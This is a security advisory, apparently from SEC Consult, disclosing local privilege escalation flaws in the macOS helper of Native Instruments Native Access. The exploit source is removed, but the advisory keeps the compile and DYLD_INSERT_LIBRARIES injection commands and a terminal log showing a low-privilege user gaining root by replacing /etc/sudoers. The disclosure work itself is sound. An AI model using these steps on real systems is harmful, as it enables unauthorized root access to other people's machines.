Management summary
The Native Instruments Native Access privileged helper component performs an insecure XPC client validation, which allows an attacker to interact with the privileged helper component and trigger privileged actions. Due to missing security checks of the implemented capabilities of the privileged helper, this leads to multiple local privilege escalation vulnerabilities.
Vendor description
"Native Instruments is a leading manufacturer of software and hardware for computer-based audio production and DJing. In June of 2023, iZotope, Plugin Alliance and Brainworx joined us in our mission to develop innovative, fully-integrated solutions for every creative task, profession, and skill level."
Source: https://www.native-instruments.com/en/company/
Business recommendation
The vendor was unreachable and did not respond to multiple contact attempts. No patch is available. Customers should contact the vendor and request a patch.
SEC Consult highly recommends to perform a thorough security review of the product conducted by security professionals to identify and resolve potential further security issues.
Vulnerability overview/description
1) Local Privilege Escalation via DYLIB Injection (CVE-2026-24070)
During the installation of the Native Access application, a privileged helper `com.native-instruments.NativeAccess.Helper2`, which is used by Native Access
to trigger functions via XPC communication like copy-file, remove or set-permissions, is deployed as well.
The communication with the XPC service of the privileged helper is only allowed if the client process is signed with the corresponding certificate and fulfills the following code signing requirement:
"anchor trusted and certificate leaf[subject.CN] = \"Developer ID Application: Native Instruments GmbH (83K5EG6Z9V)\""The Native Access application was found to be signed with the `com.apple.security.cs.allow-dyld-environment-variables` and `com.apple.security.cs.disable-library-validation` entitlements leading to DYLIB injection and therefore command execution in the context of this application.
A low privileged user can exploit the DYLIB injection to trigger functions of the privileged helper XPC service resulting in privilege escalation by first deleting the /etc/sudoers file and then copying a malicious version of that file to /etc/sudoers.
2) XPC Client Validation via PID (CVE-2026-24071)
It was found that the XPC services uses the PID of the connecting client to verify its code signature. This is considered insecure and can be exploited by PID reuse attacks.
The connection handler function uses _xpc_connection_get_pid(arg2) as argument for the hasValidSignature function. This value can not be trusted since it is vulnerable to PID reuse attacks.
10000a60c int64_t ___main_block_invoke(int64_t arg1, xpc_object_t arg2)
10000a630 if (_xpc_get_type(object: arg2) != __xpc_type_connection)
10000a64c return _syslog$DARWIN_EXTSN(5, "Unexpected type")
10000a64c
10000a65c if ((hasValidSignature(_xpc_connection_get_pid(arg2)) & 1) == 0)
10000a66c _syslog$DARWIN_EXTSN(5, "Refused connection from client with bad signature")
10000a674 _xpc_connection_cancel(arg2)
10000a674
10000a684 _xpc_connection_set_event_handler(arg2, &___block_literal_global)
10000a694 return _xpc_connection_activate(arg2) __tailcall3) No Path validation in Delete and Copy file
When triggering file copy or delete call via XPC, the service does not check if it should be allowed to delete or copy the file. No restrictions are applied for copying or deleting files. These missing restrictions lead to privilege escalation due to the possibility to delete and then write to /etc/sudoers or /Library/LaunchDaemons.
This issue is not exploitable on its own without a vulnerability allowing for connection to the privileged helper. However the other two vulnerabilities described in this advisory allow exactly that.
Proof of concept
1) Local Privilege Escalation via DYLIB Injection (CVE-2026-24070)
To check for the dangerous entitlements `com.apple.security.cs.allow-dyld-environment-variables` and `com.apple.security.cs.disable-library-validation` the "codesign" utility of MacOS can be used:
lowpriv@Users-Mac exploit % codesign -dvv --entitlements :- /Applications/Native\ Access.app/Contents/MacOS/Native\ Access
Executable=/Applications/Native Access.app/Contents/MacOS/Native Access
Identifier=com.native-instruments.nativeaccess2
[...]
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "https://www.apple.com/DTDs/PropertyList-1.0.dtd"><plist version="1.0">
<dict>
<key>com.apple.security.cs.allow-dyld-environment-variables</key>
<true/>
<key>com.apple.security.cs.allow-jit</key>
<true/>
<key>com.apple.security.cs.allow-unsigned-executable-memory</key>
<true/>
<key>com.apple.security.cs.disable-library-validation</key>
<true/>
</dict>
</plist>The privileged helper located at /Library/PrivilegedHelperTools/com.native-instruments.NativeAccess.Helper2 was found to check the code signature of the XPC client before running any action. Due to the DYLIB injection vulnerability in the Native Access executable it is possible to execute code in the context of the process of Native Access which has a valid signature for the needed Team ID. The XPC service exposed multiple functions, e.g. copy-file and remove.
The following code was used to craft a malicious DYLIB, which on load connects to the privileged helper XPC service and deletes the /etc/sudoers file as such that it can then copy a malicious version of the sudoers file to /etc/sudoers.
[ PoC exploit code removed ]On a Mac system with the developer tools installed the PoC library can be compiled as follows:
$ clang -framework Foundation -dynamiclib -o libxpcclient.dylib libxpcclient.mBefore running the exploit ensure that the file /tmp/bad_sudoers exists and is a valid sudoers file! The exploit can then be executed using the DYLIB injection:
$ DYLD_INSERT_LIBRARIES=<path_to_DYLIB> "/Applications/Native Access.app/Contents/MacOS/Native Access"The bad_sudoers file will then be copied to /etc/sudoers.
lowpriv@Users-Mac ~ % id
uid=503(lowpriv) gid=20(staff) groups=20(staff),12(everyone),61(localaccounts),399(com.apple.access_ssh-disabled),701(com.apple.sharepoint.group.1),703(com.apple.sharepoint.group.3),100(_lpoperator),702(com.apple.sharepoint.group.2)
lowpriv@Users-Mac ~ % sudo id
Password:
lowpriv is not in the sudoers file.
This incident has been reported to the administrator.
lowpriv@Users-Mac ~ % DYLD_INSERT_LIBRARIES=/Users/lowpriv/Desktop/exploit/libxpcclient.dylib "/Applications/Native Access.app/Contents/MacOS/Native Access"
2025-07-22 05:38:03.334 Native Access[35760:498359] [+] Dylib loaded. Starting XPC communication...
2025-07-22 05:38:03.458 Native Access[35760:498359] Received reply:
2025-07-22 05:38:03.458 Native Access[35760:498359] success: <bool: 0x20a033370>: true
2025-07-22 05:38:03.466 Native Access[35760:498359] Received reply:
2025-07-22 05:38:03.466 Native Access[35760:498359] success: <bool: 0x20a033370>: true
^C
lowpriv@Users-Mac ~ % sudo id
Password:
uid=0(root) gid=0(wheel) groups=0(wheel),1(daemon),2(kmem),3(sys),4(tty),5(operator),8(procview),9(procmod),12(everyone),20(staff),29(certusers),61(localaccounts),80(admin),701(com.apple.sharepoint.group.1),703(com.apple.sharepoint.group.3),33(_appstore),98(_lpadmin),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),399(com.apple.access_ssh-disabled),400(com.apple.access_remote_ae),702(com.apple.sharepoint.group.2)2) XPC Client Codesign via PID (CVE-2026-24071)
To exploit the PID usage for the client validation, a known PID reuse attack can be used. There are several templates for this attack available. The following code can be used to exploit this:
[ PoC exploit code removed ]3) No Path validation in Delete and Copy file
No PoC available.
Vulnerable / tested versions
The following versions have been tested on MacOS Sequoia and MacOS Tahoe:
- verified on 3.18.1, 3.19.0, 3.20.1, 3.21.0, 3.21.1 and up to 3.22.0 (potentially all lower versions might be vulnerable too).